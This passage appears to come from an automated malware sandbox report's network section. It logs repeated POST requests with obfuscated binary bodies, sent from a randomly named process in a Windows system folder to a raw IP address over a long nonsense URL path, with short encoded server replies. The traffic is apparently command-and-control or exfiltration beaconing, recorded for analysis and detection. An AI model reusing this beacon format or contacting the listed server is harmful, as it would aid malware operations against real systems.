    Data Ascii: YQFU^YVUX[WVP\[[UT^XT\QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/!](&</*<[8<+4\6;T(#++/*B&[+0'_!/Y.
Jan 10, 2025 07:58:32.208966017 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID: 67 | Source IP: 192.168.2.4 | Source Port: 50008 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:32.310082912 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2036
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:32.723364115 CET | 2036 | OUT | Data Raw: 5c 52 46 53 5e 5e 56 53 58 5b 57 56 50 5f 5b 53 55 50 5e 52 54 51 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \RFS^^VSX[WVP_[SUP^RTQQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;;(:?%?,*1S<=#<'!$+#**&8X3*'_!/Y.9
Jan 10, 2025 07:58:33.081465006 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:33.210731983 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 1e 39 1f 37 2b 0e 1e 26 59 35 57 2e 3c 2d 50 2b 09 37 00 29 04 24 06 29 20 3c 0d 39 2f 0a 0d 21 05 21 14 3c 0c 0b 0f 24 3c 3c 56 27 27 21 59 0c 13 26 59 3f 04 3d 57 3d 2a 3b 07 3f 0f 21 1d 33 33 3b 12 25 3d 25 52 34 3c 2c 5d 3f 2a 3a 09 28 21 39 1f 2d 2a 27 02 2a 2c 2b 0d 33 0c 2a 57 0c 1f 26 54 22 21 22 0f 21 0b 26 5c 25 28 09 56 33 5e 28 1c 26 11 38 03 20 3a 3c 06 2d 5f 37 01 35 3e 34 58 3e 58 39 0a 36 0b 2b 0a 29 3c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 9897+&Y5W.<-P+7)$) <9/!!<$<<V''!Y&Y?=W=*;?!33;%=%R4<,]?*:(!9-*'*,+3*W&T"!"!&\%(V3^(&8 :<-_75>4X>X96+)< Q""P0]Q0


Session ID: 68 | Source IP: 192.168.2.4 | Source Port: 50009 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:32.454057932 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:32.798728943 CET | 2544 | OUT | Data Raw: 59 51 43 51 5b 5c 56 57 58 5b 57 56 50 5f 5b 5b 55 5c 5e 5d 54 59 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YQCQ[\VWX[WVP_[[U\^]TYQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A8'Z+_((,:(=<)8+5+Q<Y=B%><^3:'_!/Y.9
Jan 10, 2025 07:58:33.235840082 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:33.369803905 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 69 | Source IP: 192.168.2.4 | Source Port: 50017 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:33.514111042 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:33.860999107 CET | 2544 | OUT | Data Raw: 59 5f 43 56 5b 5b 53 52 58 5b 57 56 50 59 5b 51 55 53 5e 58 54 59 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: Y_CV[[SRX[WVPY[QUS^XTYQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1+-2>6$X,.(=(Y<;45T(3Z),*&-(&*'_!/Y.!
Jan 10, 2025 07:58:34.276427984 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:34.426084042 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 70 | Source IP: 192.168.2.4 | Source Port: 50023 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:34.555908918 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:34.907839060 CET | 2544 | OUT | Data Raw: 59 54 46 50 5e 5e 53 55 58 5b 57 56 50 53 5b 5a 55 52 5e 5f 54 51 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YTFP^^SUX[WVPS[ZUR^_TQQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@/0<[>%4]/9=+;?88\5+7^>>1X3*'_!/Y.
Jan 10, 2025 07:58:35.311350107 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:35.463435888 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 71 | Source IP: 192.168.2.4 | Source Port: 50028 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:35.950889111 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2536
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:36.298559904 CET | 2536 | OUT | Data Raw: 59 57 43 57 5b 5a 53 57 58 5b 57 56 50 5b 5b 52 55 52 5e 5a 54 5c 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YWCW[ZSWX[WVP[[RUR^ZT\Q^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/2/X+.?(,)(+);+!'+('=G1>#''_!/Y.-
Jan 10, 2025 07:58:36.692507982 CET | 225 | IN | HTTP/1.1 100 Continue
    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 33 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


Session ID: 72 | Source IP: 192.168.2.4 | Source Port: 50039 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:36.823646069 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:37.173472881 CET | 2544 | OUT | Data Raw: 5c 52 43 55 5b 59 56 52 58 5b 57 56 50 52 5b 5b 55 54 5e 5a 54 5c 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \RCU[YVRX[WVPR[[UT^ZT\QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D/",>-1+6#/*-?$X+(8\5 <3)Y92>#0'_!/Y.
Jan 10, 2025 07:58:37.561105013 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:37.713267088 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 73 | Source IP: 192.168.2.4 | Source Port: 50045 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:37.857400894 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2536
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:38.204751968 CET | 2536 | OUT | Data Raw: 59 52 46 57 5e 5f 53 57 58 5b 57 56 50 5b 5b 50 55 54 5e 5a 54 5e 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YRFW^_SWX[WVP[[PUT^ZT^Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1,(<%4;W?$);<[!,( +X)Y)1.;3:'_!/Y.%


Session ID: 74 | Source IP: 192.168.2.4 | Source Port: 50046 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:38.270625114 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2036
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:38.628175020 CET | 2036 | OUT | Data Raw: 5c 54 43 52 5b 5c 56 56 58 5b 57 56 50 5d 5b 50 55 5d 5e 5f 54 50 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \TCR[\VVX[WVP][PU]^_TPQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',"$>=_>6 8*(>(('"$8+ >*%(Y$'_!/Y.1
Jan 10, 2025 07:58:39.107450008 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:39.236702919 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 1e 39 56 20 28 2c 1e 26 2c 21 11 2c 3f 25 57 3c 30 0a 58 2a 04 2b 58 2a 0a 3c 0e 2d 2c 24 0c 22 02 39 5e 2b 22 04 56 24 12 24 52 26 27 21 59 0c 13 25 00 28 04 2d 1d 3e 03 2f 03 3f 31 0c 45 33 33 27 1d 30 03 31 53 23 59 3c 5a 3c 39 22 0c 28 22 3d 53 2d 2a 33 05 28 2c 2c 1f 24 0c 2a 57 0c 1f 26 56 36 32 25 13 21 21 29 03 24 38 38 0c 33 06 20 1c 24 3f 28 05 23 14 23 5b 2d 07 24 12 22 3e 09 02 2a 10 00 56 23 21 3c 17 3f 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 989V (,&,!,?%W<0X*+X*<-,$"9^+"V$$R&'!Y%(->/?1E33'01S#Y<Z<9"("=S-*3(,,$*W&V62%!!)$883 $?(##[-$">*V#!<? Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 50050 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:38.880065918 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2544
  Expect: 100-continue
  Connection: Keep-Alive
Jan 10, 2025 07:58:39.236124992 CET | 2544 | OUT | Data Raw: 59 5e 46 53 5e 5d 56 56 58 5b 57 56 50 5c 5b 54 55 52 5e 5f 54 5a 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
  Data Ascii: Y^FS^]VVX[WVP\[TUR^_TZQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.!?9<5$Z8!U<?(8]";T<U7=<:C%=/$:'_!/Y.
Jan 10, 2025 07:58:39.586740017 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:39.720976114 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:39 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 50058 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:39.848947048 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2544
  Expect: 100-continue
Jan 10, 2025 07:58:40.205039978 CET | 2544 | OUT | Data Raw: 59 54 46 53 5e 5e 56 5e 58 5b 57 56 50 53 5b 56 55 54 5e 5d 54 51 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
  Data Ascii: YTFS^^V^X[WVPS[VUT^]TQQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'E8W8?=+6?/\9<>?(5$<3Y):C&=0:'_!/Y.
Jan 10, 2025 07:58:40.664228916 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:40.798530102 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:40 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 50064 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:40.979882956 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2544
  Expect: 100-continue
Jan 10, 2025 07:58:41.333189964 CET | 2544 | OUT | Data Raw: 59 53 46 52 5e 5e 56 5f 58 5b 57 56 50 53 5b 52 55 54 5e 5c 54 5b 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
  Data Ascii: YSFR^^V_X[WVPS[RUT^\T[Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$82/<"+&\/*9V<><^?;'#$(0)<=1>8':'_!/Y.
Jan 10, 2025 07:58:41.724344969 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:41.962632895 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:41 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=V@[0
Jan 10, 2025 07:58:41.962658882 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:41 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 50070 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:42.083045959 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2544
  Expect: 100-continue
  Connection: Keep-Alive
